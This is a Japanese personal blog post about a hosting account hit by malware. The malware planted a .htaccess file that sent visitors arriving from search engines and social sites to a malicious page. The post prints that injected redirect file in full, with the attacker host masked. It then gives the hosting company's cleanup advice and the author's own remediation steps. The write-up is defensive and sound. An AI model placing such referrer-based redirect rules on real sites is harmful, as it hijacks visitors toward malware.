ホームページ作成の小技-BreathTake-

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

--------(--) --:-- スポンサー広告 編集 |

恐怖!! 巨大怪獣マルウェア星人侵入

昨年の某日、某サーバーが「マルウェア」と総称されるウィルスに感染しました。
作成したサイトにアクセスするとウィルスバスターが起動してブロックされてしまうのです。
さらに、検索サイトでその検索すると、「ウィルスに感染する可能性があります」みたいな表示が出てしまいます。

■症状■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

①カレントディレクトリに、「.htaccess」ファイルが自動作成される。
②検査エンジン等からアクセスするとそのファイルが先に読み込まれ、ウィルス感染サイトにリダイレクトされる。
ことにより、不正サイトと見なされてしまうのが原因でした。

「.htaccess」ファイルの中味(怖いのでURLはXに変更してあります)

RewriteEngine On
ErrorDocument 400 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 401 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 403 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 404 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 500 http://XXXXXXXXXXXXX.XX/in.cgi?8
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://XXXXXXXXXXXXX.XX/in.cgi?8 [R=301,L]

■マルウェア感染に関するサーバー管理会社の回答■■■■■■■■■■■■

①お客様のPCがウィルスに感染したことによりFTPパスワードが流出した可能性
・お客様がお使いのPCソフト(インターネットエクスプローラやAdobe Reader、Adobe Flash Player)にて旧バージョンをお使いの場合に、プログラムの脆弱性を突かれてウィルスに感染することがございます。
・ご参考
https://www.xserver.ne.jp/news_detail.php?view_id=599
・以下外部サイトでございます:
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm?from=navlk
http://ascii.jp/elem/000/000/421/421931/
http://www.itmedia.co.jp/enterprise/articles/0910/23/news039.html
→FTPアカウントやサーバーアカウントのパスワードの変更を推奨いたします。

②お客様がサーバー上にアップロードしたプログラムの脆弱性を突かれたことにより不正なファイルをアップロードされた可能性
※xoops等のような有名プログラムにて、脆弱性が残ったままの古いバージョンのプログラムを使用し続けると、即時不正アクセスの対象となってしまいます。
・ご利用のプログラムは必ず最新のものへと更新頂く必要がございます。
・自作のスクリプトをご利用されている場合は、セキュリティ面に問題はないか、再度ご確認くださいますよう宜しくお願いいたします。

③お客様がお使いのFTPパスワードが単純な英単語の組み合わせなど、容易に推測される文字列であり、パスワードを推測され、乗っ取られた可能性

いずれの場合にも、お客様のPCや運用中のサイトのセキュリティ対策はお客様ご自身にて管理を行っていただく責任がございます。
不正アクセスをそのままにしておきますと、お客様のサーバーアカウント上で大量のメール送信やフィッシングサイトの開設等が行われる可能性がございます。
大量メール送信は、各種プロバイダーにSPAMサーバーとして認定される場合がある等、該当サーバーに対してのリスクが非常に大きく、他の利用者様に多大な迷惑がかかってしまうものでございます。

▼対応手順
(現在はすべて行っていただく必要はございませんが、それぞれの対応を推奨しております。)

①お客様のPCにてウィルスソフトを最新のものにしていただき、ウィルスチェック・駆除をします。
※ お使いのPCがウィルスに感染したことにより、 FTPパスワードが盗まれた可能性がございます。 必ずウィルスチェックをしてください。

②お客様のPCにてWindows UPDATEやその他お使いのソフトのバージョンアップなど、ご利用環境を最新のものにしてください。
(Adobe Reader、Flash Playerなどのバージョンアップも併せてお願いします)
※ 昨今ではAdobe Readerの脆弱性を突いたウィルスの流行がございました。上記ソフトをお使いの場合、必ずバージョンアップをしてください。
また、java scriptの設定は必ずOFFへとお切り替えください。

③必要に応じてFTPパスワードを変更します
単純な英単語の羅列ではなく、数字などを絡めたわかりづらいものへとご変更ください。

④FTPにて接続し、サーバー上のファイルを一度全て削除します。
・現在設定されている全てのドメインの追加設定を削除してください。
・また、初期ドメインフォルダやその他ご作成のフォルダ・ファイルは、FTPソフトでサーバーへ接続の上お客様ご自身で削除を行ってください。
※ ドメイン設定の削除によりメールデータが全て削除されます。必要なメールはあらかじめ受信してくださいますようお願いいたします。
・改ざんされたhtmlファイル等以外にも、悪意のあるプログラムを設置されている可能性がございます。大変お手数ですが、FTPにてサーバーアカウント上の【全てのファイル】を一度削除していだだくことをお勧めいたします。
・FTPパスワードが漏洩している可能性があるため、FTPにてアクセスできるフォルダ上のファイルは念のために全て削除していただければより安全かと存じます。

⑤サーバーパネルからのドメイン設定追加
・メールアカウント設定、FTPによるデータアップロードなどを行ってください。
※CGI等お使いの場合はパーミッションの変更にご注意ください。

⑥また、この度のようなウィルスにつきましては、お客様のPCに感染した後、同PCに設定されているFTPアカウント情報を悪意ある第三者に奪取されFTP上のデータの改ざん等が行われるという特徴がございます。
このため、「.ftpaccess」を用いてFTPへのアクセスを制限するといった対策も有効でございます。
・ご検討のうえご対処いただければと存じます。

また上記対応と併せて、PHPプログラムなど脆弱性のあるものをそのままにして利用されていないかご確認ください。
※ CMSなどのプログラムは必ず最新のものへとアップデートしてください。
脆弱性があるものをそのまま利用されると、第三者に容易に 改ざんされてしまいます。

以上

【参照】
別サイトを見ると、マルウェアへの感染防止策として下記のようなことがかかれてあります。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3)Adobe ReaderのAcrobat JavaScriptを無効に設定する
(4)JRE(Java Runtime Environment)を最新版に更新する
(5)Flash Playerを最新版に更新する
(6)QuickTimeを最新版に更新する

■対 処■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

①FTPソフトの定番「FFFTP」ソフト。
起動時にパスワード入力の必要が無い古いバージョンを使っていたので、最新のものに変更
http://www2.biglobe.ne.jp/~sota/ffftp.html

②サーバーにアップしているファイルを全てダウンロードしてウィルス検査を実行
どこぞのサイトに書いていた方法だけど、これって意味無いのではないか?

③NucleusCMSのパスワードが簡単なものだったので複雑なものに変更

④脆弱性対策情報データベースサイトで、パソコンに入っているソフトが最新のものかチェック
・MyJVN 脆弱性対策情報収集ツール
・MyJVN バージョンチェッカ
・MyJVN セキュリティ設定チェッカ
の三種類があり、インストールされているソフトが古い場合のアップデート方法も記載されております。
http://jvndb.jvn.jp/apis/myjvn/index.html#VCCHECK

⑤NucleusCMSのアップデート
・日本語版3.51へアップデートするのですが、NucleusCMSは仕様変更になっており、データベースのアップデートが必要になります。
・ひとつのテーブルで項目一個追加になっただけなのですが、アップデートにはずいぶんと手間がかかりました。

⑥NucleusCMSのプラグインである「スキンファイル管理」がFTPソフトの代用をしているので、そのプラグインを外す。

⑦ドメイン取得しているサイトのメールサーバーを調べて、不正なメールが無いかをチェック。

以上の作業。一度にやった訳では無く、毎日少しづつ試して行って、「.htaccess」ファイルが作成されていないかをチェックしながら作業して行ったのですが、それでも解決しません。

⑧HTMLで作成しているドメインのホームページは大丈夫な筈なので、NucleusCMSで作成したものをHTMLで作り変えて見ましたが、それでも駄目です。

⑨PHPを使って、自分で作成したプログラムのデモ版が入っているディレクトリを全削除しても駄目。

⑩結局、ネットでダウンロードしたフリーのショッピングカートが入っていたディレクトリを削除したら、「.htaccess」ファイルが自動生成されなくなりました。

下記のいずれかのショッピングカートが原因と思われますが、特定いたしてはおりません。


ルミーズ ショッピングカート
・remisと言う、クレジット決済の会社で配布しているショッピングカート。
・サクサク導入出来て、カスタマイズも簡単。
CGI Palmaxショッピングカート
・かなり本格的なサイト構築が可能。
・会員制、ポイント制、携帯モバイルショッピング、定形外郵便の送料…等に対応
CGI Pal cart_k ショッピングカート
・maxの携帯機能だけに特化したカート。
CGI Pal Cart_b ショッピングカート
・maxの簡易版、インラインフレームで呼び出して使うなら、こちらのほうが簡単です。
CGIの匠ショッピングカート
・CGI制作をしている会社のショッピングカートシステム
ウェブ・ストアーショッピングカート
・商品の改廃は直接プログラムを編集して行わなければならないので、「サイト構築して商品登録はお客様まかせ」という用途には使えません。
ZenCartショッピングカート
・これだけの機能があるショッピングカートが無料で使えるのは凄いと思います。
・ショッピングカート=ZenCartというほど有名で、導入もさほど難しく無いです。
…が、多機能すぎて、初期画面を見ただけで、これからのカスタマイズを考えるとうんざりします。

スポンサーサイト



管理者にだけ表示を許可する
Top
http://akb48boys.blog39.fc2.com/tb.php/3-975ae097
copyright © 2011 BreathTake all rights reserved. / Template By innerlife02
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。